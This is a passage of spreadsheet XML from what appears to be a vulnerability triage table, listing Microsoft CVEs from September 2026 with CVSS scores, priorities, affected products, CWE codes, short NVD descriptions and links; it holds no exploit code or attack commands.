      <c r="F155" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G155" s="5" t="inlineStr"/>
      <c r="H155" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I155" s="5" t="inlineStr"/>
      <c r="J155" s="5" t="inlineStr"/>
      <c r="K155" s="5" t="inlineStr"/>
      <c r="L155" s="5" t="inlineStr"/>
      <c r="M155" s="5" t="inlineStr"/>
      <c r="N155" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O155" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P155" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q155" s="5" t="inlineStr"/>
      <c r="R155" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S155" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Visual Studio allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T155" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69522</t>
        </is>
      </c>
    </row>
    <row r="156">
      <c r="A156" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B156" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C156" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69529</t>
        </is>
      </c>
      <c r="D156" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E156" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F156" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G156" s="5" t="inlineStr"/>
      <c r="H156" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I156" s="5" t="inlineStr"/>
      <c r="J156" s="5" t="inlineStr"/>
      <c r="K156" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:access, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t>
        </is>
      </c>
      <c r="L156" s="5" t="inlineStr"/>
      <c r="M156" s="5" t="inlineStr"/>
      <c r="N156" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O156" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P156" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q156" s="5" t="inlineStr"/>
      <c r="R156" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S156" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Microsoft Office Access allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T156" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69529</t>
        </is>
      </c>
    </row>
    <row r="157">
      <c r="A157" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B157" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C157" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69547</t>
        </is>
      </c>
      <c r="D157" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E157" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F157" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G157" s="5" t="inlineStr"/>
      <c r="H157" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="I157" s="5" t="inlineStr"/>
      <c r="J157" s="5" t="inlineStr"/>
      <c r="K157" s="5" t="inlineStr"/>
      <c r="L157" s="5" t="inlineStr"/>
      <c r="M157" s="5" t="inlineStr"/>
      <c r="N157" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O157" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P157" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q157" s="5" t="inlineStr"/>
      <c r="R157" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S157" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows DHCP Server allows an authorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T157" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69547</t>
        </is>
      </c>
    </row>
    <row r="158">
      <c r="A158" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B158" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C158" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69551</t>
        </is>
      </c>
      <c r="D158" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E158" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F158" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G158" s="5" t="inlineStr"/>
      <c r="H158" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="I158" s="5" t="inlineStr"/>
      <c r="J158" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K158" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L158" s="5" t="inlineStr"/>
      <c r="M158" s="5" t="inlineStr"/>
      <c r="N158" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O158" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P158" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q158" s="5" t="inlineStr"/>
      <c r="R158" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S158" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows DNS allows an authorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T158" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69551</t>
        </is>
      </c>
    </row>
    <row r="159">
      <c r="A159" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B159" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C159" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69556</t>
        </is>
      </c>
      <c r="D159" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E159" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F159" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G159" s="5" t="inlineStr"/>
      <c r="H159" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I159" s="5" t="inlineStr"/>
      <c r="J159" s="5" t="inlineStr"/>
      <c r="K159" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:word</t>
        </is>
      </c>
      <c r="L159" s="5" t="inlineStr"/>
      <c r="M159" s="5" t="inlineStr"/>
      <c r="N159" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O159" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P159" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q159" s="5" t="inlineStr"/>
      <c r="R159" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S159" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Microsoft Office Word allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T159" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69556</t>
        </is>
      </c>
    </row>
    <row r="160">
      <c r="A160" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B160" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C160" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69598</t>
        </is>
      </c>
      <c r="D160" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E160" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F160" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G160" s="5" t="inlineStr"/>
      <c r="H160" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I160" s="5" t="inlineStr"/>
      <c r="J160" s="5" t="inlineStr"/>
      <c r="K160" s="5" t="inlineStr"/>
      <c r="L160" s="5" t="inlineStr"/>
      <c r="M160" s="5" t="inlineStr"/>
      <c r="N160" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O160" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P160" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q160" s="5" t="inlineStr"/>
      <c r="R160" s="5" t="inlineStr">
        <is>
          <t>CWE-131</t>
        </is>
      </c>
      <c r="S160" s="5" t="inlineStr">
        <is>
          <t>Incorrect calculation of buffer size in Windows iSCSI allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T160" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69598</t>
        </is>
      </c>
    </row>
    <row r="161">
      <c r="A161" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B161" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C161" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69601</t>
        </is>
      </c>
      <c r="D161" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E161" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F161" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G161" s="5" t="inlineStr"/>
      <c r="H161" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I161" s="5" t="inlineStr"/>
      <c r="J161" s="5" t="inlineStr"/>
      <c r="K161" s="5" t="inlineStr"/>
      <c r="L161" s="5" t="inlineStr"/>
      <c r="M161" s="5" t="inlineStr"/>
      <c r="N161" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O161" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P161" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q161" s="5" t="inlineStr"/>
      <c r="R161" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S161" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Microsoft Windows Media Foundation allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T161" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69601</t>
        </is>
      </c>
    </row>
    <row r="162">
      <c r="A162" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B162" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C162" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69603</t>
        </is>
      </c>
      <c r="D162" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E162" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F162" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G162" s="5" t="inlineStr"/>
      <c r="H162" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I162" s="5" t="inlineStr"/>
      <c r="J162" s="5" t="inlineStr"/>
      <c r="K162" s="5" t="inlineStr"/>
      <c r="L162" s="5" t="inlineStr"/>
      <c r="M162" s="5" t="inlineStr"/>
      <c r="N162" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O162" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P162" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q162" s="5" t="inlineStr"/>
      <c r="R162" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S162" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Hyper-V allows an authorized attacker to execute code locally.</t>
        </is>
      </c>
      <c r="T162" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69603</t>
        </is>
      </c>
    </row>
    <row r="163">
      <c r="A163" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B163" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C163" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69614</t>
        </is>
      </c>
      <c r="D163" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E163" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F163" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G163" s="5" t="inlineStr"/>
      <c r="H163" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="I163" s="5" t="inlineStr"/>
      <c r="J163" s="5" t="inlineStr"/>
      <c r="K163" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:access, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t>
        </is>
      </c>
      <c r="L163" s="5" t="inlineStr"/>
      <c r="M163" s="5" t="inlineStr"/>
      <c r="N163" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O163" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P163" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q163" s="5" t="inlineStr"/>
      <c r="R163" s="5" t="inlineStr">
        <is>
          <t>CWE-121, CWE-20</t>
        </is>
      </c>
      <c r="S163" s="5" t="inlineStr">
        <is>
          <t>Stack-based buffer overflow in Microsoft Office Access allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T163" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69614</t>
        </is>
      </c>
    </row>
    <row r="164">
      <c r="A164" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B164" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C164" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69628</t>
        </is>
      </c>
      <c r="D164" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E164" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F164" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G164" s="5" t="inlineStr"/>
      <c r="H164" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="I164" s="5" t="inlineStr"/>
      <c r="J164" s="5" t="inlineStr"/>
      <c r="K164" s="5" t="inlineStr"/>
      <c r="L164" s="5" t="inlineStr"/>
      <c r="M164" s="5" t="inlineStr"/>
      <c r="N164" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O164" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P164" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q164" s="5" t="inlineStr"/>
      <c r="R164" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S164" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows iSCSI allows an authorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T164" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69628</t>
        </is>
      </c>
    </row>
    <row r="165">
      <c r="A165" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B165" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C165" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69629</t>
        </is>
      </c>
      <c r="D165" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E165" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F165" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G165" s="5" t="inlineStr"/>
      <c r="H165" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I165" s="5" t="inlineStr"/>
      <c r="J165" s="5" t="inlineStr"/>
      <c r="K165" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:outlook</t>
        </is>
      </c>
      <c r="L165" s="5" t="inlineStr"/>
      <c r="M165" s="5" t="inlineStr"/>
      <c r="N165" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O165" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P165" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q165" s="5" t="inlineStr"/>
      <c r="R165" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S165" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Microsoft Office Outlook allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T165" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69629</t>
        </is>
      </c>
    </row>
    <row r="166">
      <c r="A166" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B166" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C166" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69632</t>
        </is>
      </c>
      <c r="D166" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E166" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F166" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G166" s="5" t="inlineStr"/>
      <c r="H166" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I166" s="5" t="inlineStr"/>
      <c r="J166" s="5" t="inlineStr"/>
      <c r="K166" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t>
        </is>
      </c>
      <c r="L166" s="5" t="inlineStr"/>
      <c r="M166" s="5" t="inlineStr"/>
      <c r="N166" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O166" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P166" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q166" s="5" t="inlineStr"/>
      <c r="R166" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S166" s="5" t="inlineStr">
        <is>
          <t>Use after free in Microsoft Office allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T166" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69632</t>
        </is>
      </c>
    </row>
    <row r="167">
      <c r="A167" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B167" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C167" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69649</t>
        </is>
      </c>
      <c r="D167" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E167" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F167" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G167" s="5" t="inlineStr"/>
      <c r="H167" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I167" s="5" t="inlineStr"/>
      <c r="J167" s="5" t="inlineStr"/>
      <c r="K167" s="5" t="inlineStr"/>
      <c r="L167" s="5" t="inlineStr"/>
      <c r="M167" s="5" t="inlineStr"/>
      <c r="N167" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O167" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P167" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q167" s="5" t="inlineStr"/>
      <c r="R167" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S167" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Raw Image Extension allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T167" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69649</t>
        </is>
      </c>
    </row>
    <row r="168">
      <c r="A168" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B168" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C168" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69669</t>
        </is>
      </c>
      <c r="D168" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E168" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F168" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G168" s="5" t="inlineStr"/>
      <c r="H168" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I168" s="5" t="inlineStr"/>
      <c r="J168" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K16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8" s="5" t="inlineStr"/>
      <c r="M168" s="5" t="inlineStr"/>
      <c r="N168" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O168" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P168" s="5" t="inlineStr">
        <is>
          <t>2026-09-15</t>
        </is>
      </c>
      <c r="Q168" s="5" t="inlineStr"/>
      <c r="R168" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S168" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Kernel allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T168" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69669</t>
        </is>
      </c>
    </row>
    <row r="169">
      <c r="A169" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B169" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C169" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69671</t>
        </is>
      </c>
      <c r="D169" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E169" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F169" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G169" s="5" t="inlineStr"/>
      <c r="H169" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I169" s="5" t="inlineStr"/>
      <c r="J169" s="5" t="inlineStr"/>
      <c r="K169" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:word</t>
        </is>
      </c>
      <c r="L169" s="5" t="inlineStr"/>
      <c r="M169" s="5" t="inlineStr"/>
      <c r="N169" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O169" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P169" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q169" s="5" t="inlineStr"/>
      <c r="R169" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S169" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Microsoft Office Word allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T169" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69671</t>
        </is>
      </c>
    </row>
    <row r="170">
      <c r="A170" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B170" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C170" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69676</t>
        </is>
      </c>
      <c r="D170" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E170" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F170" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G170" s="5" t="inlineStr"/>
      <c r="H170" s="5" t="n">
        <v>0.012</v>
      </c>
      <c r="I170" s="5" t="inlineStr"/>
      <c r="J170" s="5" t="inlineStr"/>
      <c r="K170" s="5" t="inlineStr"/>
      <c r="L170" s="5" t="inlineStr"/>
      <c r="M170" s="5" t="inlineStr"/>
      <c r="N170" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O170" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P170" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q170" s="5" t="inlineStr"/>
      <c r="R170" s="5" t="inlineStr">
        <is>
          <t>CWE-294</t>
        </is>
      </c>
      <c r="S170" s="5" t="inlineStr">
        <is>
          <t>Authentication bypass by capture-replay in Windows Kerberos allows an authorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T170" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69676</t>
        </is>
      </c>
    </row>
    <row r="171">
      <c r="A171" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B171" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C171" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69678</t>
        </is>
      </c>
      <c r="D171" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E171" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F171" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G171" s="5" t="inlineStr"/>
      <c r="H171" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I171" s="5" t="inlineStr"/>
      <c r="J171" s="5" t="inlineStr"/>
      <c r="K171" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:powerpoint</t>
        </is>
      </c>
      <c r="L171" s="5" t="inlineStr"/>
      <c r="M171" s="5" t="inlineStr"/>
      <c r="N171" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O171" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P171" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q171" s="5" t="inlineStr"/>
      <c r="R171" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S171" s="5" t="inlineStr">
        <is>
          <t>Use after free in Microsoft Office PowerPoint allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T171" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69678</t>
        </is>
      </c>
    </row>
    <row r="172">
      <c r="A172" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B172" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C172" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69686</t>
        </is>
      </c>
